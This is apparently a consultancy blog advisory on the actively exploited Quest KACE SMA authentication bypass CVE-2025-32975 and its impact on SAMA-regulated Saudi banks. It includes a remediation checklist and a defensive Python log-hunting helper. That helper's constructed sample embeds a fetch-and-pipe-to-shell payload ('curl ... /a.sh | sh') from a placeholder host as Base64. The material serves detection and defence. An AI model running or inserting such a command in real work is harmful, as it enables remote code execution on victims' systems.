
CVE-2025-32975: Quest KACE SMA Auth Bypass Hits Saudi Bank Endpoint Management

A CVSS 10.0 pre-authentication bypass in Quest KACE SMA is being actively exploited. For Saudi banks running KACE for patching and inventory, the blast radius reaches every managed endpoint. Here is what SAMA-regulated CISOs must do this week.

FyntraLink Team

CISA has added CVE-2025-32975 — a CVSS 10.0 pre-authentication bypass in Quest KACE Systems Management Appliance (SMA) — to its Known Exploited Vulnerabilities (KEV) catalog with a federal remediation deadline of May 4, 2026. For Saudi banks running KACE as their endpoint management plane, this is not a routine patch cycle. The bug grants administrative takeover without credentials, and from there an attacker inherits the appliance's authority to push software, run scripts, and inventory every managed Windows, macOS, and Linux endpoint in the bank.

Inside CVE-2025-32975: How the SSO Bypass Works

Discovered and disclosed by watchTowr Labs, CVE-2025-32975 is an authentication bypass in the way KACE SMA handles Single Sign-On request flows. The appliance trusts certain identity assertions in a way that lets an unauthenticated, network-reachable attacker impersonate any legitimate user — including the built-in administrator. Quest patched it in May 2025 across KACE SMA 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4). What changed in 2026 is exploitation: Arctic Wolf observed real-world abuse beginning the week of March 9, 2026, on internet-exposed instances, with attackers chaining the bypass into the KPluginRunProcess feature to run Base64-encoded payloads as the appliance.

Why Endpoint Management Appliances Are a Tier-Zero Target

Endpoint management platforms like KACE SMA, ManageEngine Endpoint Central, Microsoft Configuration Manager, and Tanium are effectively Tier-0 systems. They hold privileged service accounts, push signed scripts and MSI packages, and reach every laptop, ATM jump host, and back-office workstation in scope. An attacker who owns the appliance does not need to phish a single user: they can deploy ransomware, drop a Cobalt Strike beacon, or tamper with a SWIFT operator workstation in one push. This is the playbook ransomware crews have run against remote management tooling before, with Kaseya VSA in 2021 and more recently ConnectWise ScreenConnect and SimpleHelp.

Impact on SAMA-Regulated Financial Institutions

KACE is widely deployed across the Saudi financial sector for software inventory, patch management, and endpoint compliance reporting, many of the same controls SAMA CSCC explicitly requires. An adversary owning the KACE appliance can simultaneously break SAMA Cyber Security Control Framework requirements 3.3.5 (Privileged Access Management), 3.3.13 (Patch Management), and 3.3.15 (Cyber Security Event Management), since the appliance is both the enforcement point and a logging source. Under PDPL Article 21, a confirmed compromise that exposes employee or customer personal data triggers a 72-hour notification obligation to SDAIA. NCA ECC controls 2-7-1 and 2-10-3 (vulnerability and event management) also come into play if the bank operates under joint regulatory scope. Third-party risk teams should note that any managed services provider using KACE inside the bank's environment falls under SAMA's Cyber Security Framework Annex F third-party requirements.

Recommendations and Practical Steps

  1. Confirm the KACE SMA version against Quest KB 4379499. If the build on your branch is below 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), or 14.1.101 (Patch 4), patch this week, not next quarter.
  2. Remove the KACE web interface from the public internet immediately. Front it with the corporate VPN, ZTNA gateway, or at minimum an IP-allowlisted firewall rule.
  3. Hunt retroactively for unusual KPluginRunProcess invocations and Base64-encoded command payloads back to at least March 1, 2026, which predates the first exploitation Arctic Wolf observed. Pull the logs from your SIEM or syslog destination rather than from the appliance itself, since the local logs of a compromised appliance cannot be trusted. Arctic Wolf has published indicators that map cleanly into Splunk and Microsoft Sentinel.
  4. Rotate the KACE service account passwords, the LDAP or Active Directory bind credentials the appliance stores, the KACE SSL certificates, and any agent enrollment tokens. Assume every credential cached on the appliance is burned.
  5. Review every script, software distribution, and patch package pushed via KACE in the last 60 days for unauthorized payloads or modifications.
  6. Map the finding into your SAMA CSCC compliance evidence: update the vulnerability register, file an internal incident ticket, and if exploitation is confirmed, notify SAMA via the established incident reporting channel within the regulator's required window.
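The following is an added example for steps 1 and 3 of this checklist; it is not FyntraLink, Quest or Arctic Wolf code. The first helper compares an installed KACE SMA build string against the fixed builds listed above and treats a lower build on the same branch as vulnerable. The second scans log lines for KPluginRunProcess invocations carrying a Base64-encoded argument, decodes it, and drops hits that fall before the hunting window. The log line layout, field names, host name, user names, addresses and the payload are all constructed for the example; the real KACE log format and Arctic Wolf's indicators are not reproduced here, so adapt the regular expression to your own export.

```python
import base64
import re
from datetime import datetime

# Fixed builds as listed in the article (Quest, May 2025). A lower build on
# the same branch is treated as vulnerable; branches not listed are out of
# scope for this helper, so consult Quest KB 4379499 for them.
FIXED_BUILDS = {
    (13, 0): 385,
    (13, 1): 81,
    (13, 2): 183,
    (14, 0): 341,  # 14.0 Patch 5
    (14, 1): 101,  # 14.1 Patch 4
}


def kace_sma_patch_status(version: str) -> str:
    """Classify a build string ('14.0.339', '14.0.341 P5', ...) as 'patched',
    'vulnerable' or 'unknown-branch'. Only the numeric build is compared;
    a trailing patch label is ignored."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unparseable KACE SMA version: {version!r}")
    major, minor, build = (int(x) for x in m.groups())
    fixed = FIXED_BUILDS.get((major, minor))
    if fixed is None:
        return "unknown-branch"
    return "patched" if build >= fixed else "vulnerable"


# CONSTRUCTED log shape for this example (not the real KACE format):
#   <ISO-8601 UTC> <appliance> user=<u> src=<ip> action=<name> args="<text>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<host>\S+)\s+user=(?P<user>\S+)\s+src=(?P<ip>\S+)'
    r'\s+action=(?P<action>\S+)(?:\s+args="(?P<args>[^"]*)")?'
)
# Candidate Base64 tokens: at least 16 characters of the Base64 alphabet.
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_if_base64(token: str):
    """Return the decoded text if `token` is well-formed Base64 whose payload
    is at least 90% printable ASCII, else None. This filters out random
    identifiers that merely look like Base64."""
    if len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if not raw:
        return None
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
    if printable / len(raw) < 0.9:
        return None
    return raw.decode("ascii", errors="replace")


def _parse_ts(value: str) -> datetime:
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def hunt_kplugin_base64(lines, since="2026-03-01T00:00:00Z"):
    """Return findings for KPluginRunProcess calls at or after `since` whose
    arguments carry a decodable Base64 token, with the decoded payload."""
    cutoff = _parse_ts(since)
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["action"] != "KPluginRunProcess":
            continue
        if _parse_ts(m["ts"]) < cutoff:
            continue
        for tok in B64_TOKEN_RE.findall(m["args"] or ""):
            decoded = decode_if_base64(tok)
            if decoded is not None:
                findings.append({"ts": m["ts"], "user": m["user"],
                                 "src": m["ip"], "encoded": tok,
                                 "decoded": decoded})
    return findings


# Constructed sample: a benign action, a pre-window Base64 hit, a plain-text
# KPluginRunProcess, and an in-window Base64 payload from an external IP.
PAYLOAD = "sh -c 'curl -s http://198.51.100.7/a.sh | sh'"
ENCODED = base64.b64encode(PAYLOAD.encode()).decode()
SAMPLE_LOGS = [
    '2026-02-20T09:01:12Z kbox01 user=svc_patch src=10.20.30.5 action=DeployPatch args="bundle-2026-02"',
    f'2026-02-27T23:58:00Z kbox01 user=admin src=10.20.30.9 action=KPluginRunProcess args="{ENCODED}"',
    '2026-03-10T01:00:00Z kbox01 user=admin src=10.20.30.9 action=KPluginRunProcess args="inventory --full"',
    f'2026-03-11T02:14:05Z kbox01 user=admin src=203.0.113.45 action=KPluginRunProcess args="{ENCODED}"',
]

if __name__ == "__main__":
    for v in ("14.0.339", "14.0.341 P5", "13.1.81"):
        print(v, "->", kace_sma_patch_status(v))
    for hit in hunt_kplugin_base64(SAMPLE_LOGS):
        print(hit["ts"], hit["user"], hit["src"], "decoded:", hit["decoded"])
```

Run against the constructed sample, the hunt reports only the March 11 entry: the February 27 line is identical in shape but falls before the default March 1 cutoff, and the plain-text invocation carries no Base64 token. Widen `since` when your own timeline warrants it, and treat a decoded payload that fetches and pipes a remote script, as the sample does, as a confirmed incident rather than a finding to triage later.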

Conclusion

CVE-2025-32975 is a textbook reminder that the management plane is the prize. Endpoint management appliances must be treated as Tier-0 assets — patched on shorter SLAs than user workstations, isolated from the public internet, monitored with the same intensity as domain controllers, and continuously reviewed under SAMA CSCC, NCA ECC, and PCI-DSS lenses.

Is your organization prepared? Contact Fyntralink for a complimentary SAMA Cyber Maturity Assessment covering your endpoint management, patch governance, and Tier-0 system exposure.